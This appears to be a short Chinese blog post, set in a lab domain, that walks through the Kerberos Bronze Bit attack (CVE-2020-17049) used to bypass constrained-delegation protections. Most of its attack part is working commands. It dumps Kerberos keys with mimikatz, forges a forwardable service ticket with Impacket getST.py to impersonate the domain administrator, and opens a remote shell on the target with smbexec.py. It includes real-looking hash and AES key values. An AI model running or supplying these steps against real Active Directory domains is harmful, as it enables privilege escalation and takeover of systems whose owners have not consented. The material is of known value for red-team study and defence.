zoukankan      html  css  js  c++  java
  • Kerberos Bronze Bit Attack(CVE-2020-17049)

    一、漏洞介绍

    漏洞主要是为了解决:禁止协议转换/协议过渡、受保护的用户和敏感用户不能被委派

    二、约束委派绕过

    server.redteam.com

    wsus.redteam.com

    设置server对wsus服务进行委派(用户或计算机选择为WSUS)

    设置一个服务账户:setspn -A MSSQLSvc/Service.redteam.com:1433 sql

    spn服务账户sql设置为“敏感用户不能被委派”或者添加到“受保护的组”中

     

    尝试常规的约束委派利用,出现报错这是因为“敏感用户不能被委派”和“受保护的组”的原因

     

     尝试Kerberos Bronze Bit Attack攻击,攻击需要获取到server主机的hash与aeskey

    privilege::debug
    sekurlsa::ekeys

    KALI修改vim /etc/resolv.conf dns为域控主机ip

     python3 getST.py -spn cifs/wsus.redteam.com -impersonate administrator -hashes AAD3B435B51404EEAAD3B435B51404EE(这里是lmhash可以任意填写):7f4b4bf82a56f59a5ea4441a71cee4e0 -aesKey 93c99dc00e6ba904751414be3cd99375820cb1bc1d33cdeaf63391f7ccb90456 redteam.com/server -force-forwardable

     export KRB5CCNAME=administrator.ccache

     python3 smbexec.py -no-pass -k wsus.redteam.com

     

     

  • 相关阅读:
    每天干的啥?(2021.1)
    每天干的啥?(2020.12)
    每天干的啥?(2020.11)
    每天干的啥?(2020.10)
    每天干的啥?(2020.9)
    每天干的啥?(2020.8)
    每天干的啥?(2020.7)
    每天干的啥?(2020.6)
    每天干的啥?(2020.5)
    每天干的啥?(2020.4)
  • 原文地址:https://www.cnblogs.com/websecyw/p/14566644.html
Copyright © 2011-2022 走看看